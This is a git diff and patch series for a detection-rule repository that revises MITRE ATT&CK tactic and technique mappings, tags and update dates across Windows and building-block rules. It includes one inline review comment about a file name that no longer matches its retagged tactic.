--- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -144,36 +144,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml index 8752086e4ee..3edafaea26b 100644 --- a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml +++ b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -134,46 +134,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml index fa2fd7c192b..92ec3ed3c71 100644 
--- a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -132,46 +132,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml index 4a8e99f0049..1475fa06cf2 100644 
--- a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml +++ b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/06/05" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -109,20 +109,7 @@ references = [ risk_score = 47 rule_id = "35df0dd8-092d-4a83-88c1-5151a804f31b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -162,19 +149,18 @@ process.parent.name != null and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml index 5205c3c67f0..a2222b42bc5 100644 --- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml +++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
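Review bot: After this hunk the rule's only threat entry is `T1036.009 Break Process Trees` under `TA0005 Defense Evasion`, and the matching tags hunk swaps `Tactic: Privilege Escalation` for `Tactic: Defense Evasion`, yet the file stays at `rules/windows/privilege_escalation_unusual_parentchild_relationship.toml`. The `privilege_escalation_` prefix now names a tactic the rule no longer carries, and the rule's name and description (outside this diff) presumably still frame it the same way. If the repo keys rule file names off the leading tactic, this file belongs under a `defense_evasion_` name in the same change; if not, a line in the commit message noting the deliberate retag saves the next reader from re-opening the question.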
@@ -110,36 +110,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_via_ppid_spoofing.toml b/rules/windows/privilege_escalation_via_ppid_spoofing.toml index 35699123c49..320714b320d 100644 --- a/rules/windows/privilege_escalation_via_ppid_spoofing.toml +++ b/rules/windows/privilege_escalation_via_ppid_spoofing.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/20" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -136,24 +136,18 @@ Parent Process ID (PPID) spoofing is a technique where adversaries manipulate th [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [[rule.threat.technique.subtechnique]] id = "T1134.004" name = "Parent PID Spoofing" reference = "https://attack.mitre.org/techniques/T1134/004/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml index cb89a43db4b..bcceba7f00e 100644 --- a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml +++ b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,14 +93,18 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_via_token_theft.toml b/rules/windows/privilege_escalation_via_token_theft.toml index d6c46d38039..57d314c6ce0 100644 --- a/rules/windows/privilege_escalation_via_token_theft.toml 
+++ b/rules/windows/privilege_escalation_via_token_theft.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -22,14 +22,7 @@ references = [ risk_score = 73 rule_id = "02a23ee7-c8f8-4701-b99d-e9038ce313cb" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -149,19 +142,36 @@ In Windows environments, processes can be created with elevated tokens to perfor [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - 
diff --git a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml index 5bbc32c2c97..906baeca97c 100644 --- a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml +++ b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/07" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,14 +76,7 @@ Audit Security System Extension (Success) ``` """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -109,19 +102,36 @@ configuration where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - From b2952ba8d8bd9fb34e9fe9618df9693a6f0d4c99 Mon Sep 17 00:00:00 2001 
From: Mika Ayenson Date: Mon, 23 Mar 2026 16:57:32 -0500 Subject: [PATCH 03/16] add updated rules_building_block with tags/mitre mappings --- ...collection_archive_data_zip_imageload.toml | 8 ++- ...ction_common_compressed_archived_file.toml | 47 +------------ ...llection_microsoft_purview_dlp_signal.toml | 23 ++++++- ...microsoft_purview_insider_risk_signal.toml | 23 +------ .../collection_posh_compression.toml | 30 ++++----- ...ommand_and_control_bitsadmin_activity.toml | 30 ++------- ...llama_model_download_untrusted_source.toml | 43 +++++++----- ...access_entra_id_risk_detection_signal.toml | 30 +-------- ...ntial_access_iis_apppoolsa_pwd_appcmd.toml | 14 ++-- ...al_access_mdmp_file_unusual_extension.toml | 32 +-------- .../defense_evasion_dll_hijack.toml | 10 +-- ...evasion_dotnet_clickonce_dfsvc_netcon.toml | 16 ++--- ...fense_evasion_download_susp_extension.toml | 47 ++++--------- ...cution_via_visualstudio_prebuildevent.toml | 18 +++-- .../defense_evasion_generic_deletion.toml | 10 ++- ...fense_evasion_injection_from_msoffice.toml | 59 +++++------------ ...defense_evasion_masquerading_browsers.toml | 29 ++------ .../defense_evasion_masquerading_vlc_dll.toml | 29 ++------ ...ense_evasion_masquerading_windows_dll.toml | 34 ++-------- ...ion_masquerading_windows_system32_exe.toml | 29 ++------ ...soft_security_compliance_admin_signal.toml | 43 +++++++----- ...fense_evasion_msdt_suspicious_diagcab.toml | 32 +++++---- ...ense_evasion_outlook_suspicious_child.toml | 52 +++------------ ..._obfuscation_proportion_special_chars.toml | 30 ++------- ..._evasion_powershell_clear_logs_script.toml | 24 +------ ...nse_evasion_service_disabled_registry.toml | 25 ++++--- ...defense_evasion_service_path_registry.toml | 33 ++-------- .../defense_evasion_services_exe_path.toml | 34 ++-------- .../defense_evasion_unsigned_bits_client.toml | 13 +--- .../defense_evasion_write_dac_access.toml | 42 ++++++------ .../discovery_capnetraw_capability.toml | 25 ++++--- 
.../discovery_generic_account_groups.toml | 14 ++-- ...ry_kernel_module_enumeration_via_proc.toml | 9 ++- ...ubectl_workload_and_cluster_discovery.toml | 12 ++-- .../discovery_linux_modprobe_enumeration.toml | 44 +++++++++---- .../discovery_linux_sysctl_enumeration.toml | 30 +++++---- ...ery_linux_system_owner_user_discovery.toml | 8 ++- .../discovery_net_share_discovery_winlog.toml | 27 +------- rules_building_block/discovery_net_view.toml | 29 +------- .../discovery_of_domain_groups.toml | 8 ++- .../discovery_posh_generic.toml | 57 +++++----------- .../discovery_posh_password_policy.toml | 33 +--------- ..._post_exploitation_external_ip_lookup.toml | 12 +--- ...ery_potential_memory_seeking_activity.toml | 14 +--- ...y_process_discovery_via_builtin_tools.toml | 13 +--- ...ote_system_discovery_commands_windows.toml | 13 +++- .../discovery_security_software_wmic.toml | 19 +----- ...discovery_suspicious_proc_enumeration.toml | 10 +-- .../discovery_system_network_connections.toml | 8 ++- .../discovery_system_service_discovery.toml | 8 ++- .../discovery_win_network_connections.toml | 19 ++++-- ...d_identity_protection_risk_detections.toml | 48 ++++++++++---- ...execution_aws_lambda_function_updated.toml | 31 +++++---- ...ution_github_new_event_action_for_pat.toml | 29 ++++---- ...n_github_new_repo_interaction_for_pat.toml | 29 ++++---- ..._github_new_repo_interaction_for_user.toml | 29 ++++---- .../execution_github_repo_created.toml | 29 ++++---- ...n_github_repo_interaction_from_new_ip.toml | 29 ++++---- .../execution_linux_segfault.toml | 10 +-- .../execution_mcp_server_child_process.toml | 16 ++++- ...ution_settingcontent_ms_file_creation.toml | 48 +++++--------- ...execution_unsigned_service_executable.toml | 34 ++-------- .../impact_github_pat_access_revoked.toml | 15 +---- ...ss_anomalous_rsc_flight_data_patterns.toml | 28 ++++---- ..._access_github_new_ip_address_for_pat.toml | 34 ++++++---- ...ss_microsoft_air_investigation_signal.toml | 26 +------- 
...cess_microsoft_defender_alerts_signal.toml | 23 +------ ...t_defender_threat_intelligence_signal.toml | 32 +-------- ...ft_purview_security_compliance_signal.toml | 38 +---------- ...cess_new_okta_authentication_behavior.toml | 13 +++- ...cess_okta_admin_console_login_failure.toml | 26 +------- rules_building_block/lateral_movement_at.toml | 44 +++++-------- .../lateral_movement_posh_winrm_activity.toml | 38 +++++------ ...movement_unusual_process_sql_accounts.toml | 32 ++++----- .../lateral_movement_wmic_remote.toml | 48 ++++++-------- ...e_aws_iam_login_profile_added_to_user.toml | 21 ++---- .../persistence_github_new_pat_for_user.toml | 34 ++++------ ...github_new_user_added_to_organization.toml | 13 ++-- ...e_iam_instance_request_to_iam_service.toml | 31 +++++---- .../persistence_startup_folder_lnk.toml | 12 +--- .../persistence_transport_agent_exchange.toml | 24 +------ ...ce_web_server_potential_sql_injection.toml | 66 +++---------------- ...sistence_web_server_sus_file_creation.toml | 44 +------------ ..._escalation_sts_getsessiontoken_abuse.toml | 35 ++-------- 84 files changed, 775 insertions(+), 1535 deletions(-) diff --git a/rules_building_block/collection_archive_data_zip_imageload.toml b/rules_building_block/collection_archive_data_zip_imageload.toml index 445af055e36..8b65f51a63a 100644 --- a/rules_building_block/collection_archive_data_zip_imageload.toml +++ b/rules_building_block/collection_archive_data_zip_imageload.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -56,14 +56,18 @@ library where host.os.type == "windows" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/collection_common_compressed_archived_file.toml b/rules_building_block/collection_common_compressed_archived_file.toml index 5742ea8c024..b67d9497997 100644 --- a/rules_building_block/collection_common_compressed_archived_file.toml +++ b/rules_building_block/collection_common_compressed_archived_file.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = "endpoint" maturity = "production" -updated_date = "2025/01/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -76,58 +76,13 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1074" -name = "Data Staged" -reference = "https://attack.mitre.org/techniques/T1074/" -[[rule.threat.technique.subtechnique]] -id = "T1074.001" -name = "Local Data Staging" -reference = "https://attack.mitre.org/techniques/T1074/001/" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" -[[rule.threat.technique.subtechnique]] -id = "T1560.001" -name = "Archive via Utility" -reference = "https://attack.mitre.org/techniques/T1560/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1132" -name = "Data Encoding" -reference = "https://attack.mitre.org/techniques/T1132/" -[[rule.threat.technique.subtechnique]] -id = "T1132.001" -name = "Standard Encoding" -reference = "https://attack.mitre.org/techniques/T1132/001/" - - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/collection_microsoft_purview_dlp_signal.toml b/rules_building_block/collection_microsoft_purview_dlp_signal.toml index bfc6b8ca0b3..b824d6ba8a3 100644 --- a/rules_building_block/collection_microsoft_purview_dlp_signal.toml +++ b/rules_building_block/collection_microsoft_purview_dlp_signal.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,13 +56,34 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml b/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml index 20d080f5445..ecf0303733a 100644 --- a/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml +++ b/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -53,24 +53,3 @@ event.dataset:o365.audit and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules_building_block/collection_posh_compression.toml b/rules_building_block/collection_posh_compression.toml index 621b225c547..9ef72645996 100644 --- a/rules_building_block/collection_posh_compression.toml +++ b/rules_building_block/collection_posh_compression.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -207,34 +207,26 @@ value = "?:\\\\Program Files\\\\Azure\\\\StorageSyncAgent\\\\AFSDiag.ps1" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml index 3952b06069b..07bb5150945 100644 --- a/rules_building_block/command_and_control_bitsadmin_activity.toml +++ b/rules_building_block/command_and_control_bitsadmin_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -26,17 +26,7 @@ name = "Bitsadmin Activity" risk_score = 21 rule_id = "8eec4df1-4b4b-4502-b6c3-c788714604c9" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -57,38 +47,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" 